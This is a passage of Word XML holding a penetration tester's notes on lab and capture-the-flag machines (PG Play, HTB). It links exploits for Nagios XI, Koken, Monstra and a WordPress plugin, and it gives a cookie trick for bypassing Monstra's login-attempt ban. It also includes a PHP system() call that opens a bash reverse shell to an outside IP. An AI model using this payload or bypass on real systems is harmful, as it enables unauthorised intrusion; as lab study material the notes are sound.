            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://themcsam.github.io/posts/tarFs-PoC/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1288">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/52268</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A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A03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A09">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2xzhkfx63yq2" w:id="543"/>
      <w:bookmarkEnd w:id="543"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Random stuff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to get a password from USB stick, look at Mirai HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Wpwn PG Play root.txt said to look inside of USB, so we searched for the directory named USB, and then the flag was inside that directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / type -d -name "USB" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get the error "su: must be run from a terminal" or something along those lines, then that means you need an interactive shell, like you need to upgrade your shell. So follow the upgrading reverse shell section to upgrade it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nagios XI (CMS) was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1289">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Monitoring</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. It was version 5.6.0, but the write up used a version 5.6.0 exploit that worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1167"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1290">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/hadrian3689/nagiosxi_5.6.6/blob/main/exploit.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Koken (CMS) was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1291">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Photographer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG play. It was actually a pretty in-depth exploit, so I thought it would be good to include the walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A14">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Monstra CMS (version 3.0.4) was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1292">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Monster</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. And in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1293">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup, they ran into a login ban from trying too many passwords, and they found a solution using </w:t>
      </w:r>
      <w:hyperlink r:id="rId1294">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page. But basically, we can bypass this ban by adding another cookie </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">login_attempts=0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in any POST request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="171"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId1295">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">first writeup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a lot more in-depth and provides two really interesting attack vectors for Monstra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever decode something as an image (like in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1296">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Vegeta1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we decoded base64 twice and it was a PNG since it had a PNG header at the top), then you can just save it as an image (ex. .png) and then you can open it and see what it looks like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A19">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Social Warfare v3.5.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Wordpress Plugin) or an even earlier version, then look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1297">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SoSimple</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play for steps on how to exploit it using </w:t>
      </w:r>
      <w:hyperlink r:id="rId1298">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:hyperlink r:id="rId1299">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SoSimple</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> walkthrough shows us how to get a reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from it while the one above just enumerates until they found a id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;pre&gt;system("bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.45.197/443 0&gt;&amp;1'")&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A1D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1300">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Wpwn</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1301">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's a simple explanation from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1302">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SoSimple</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A21">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat test.txt</w:t>
      </w:r>
    </w:p>
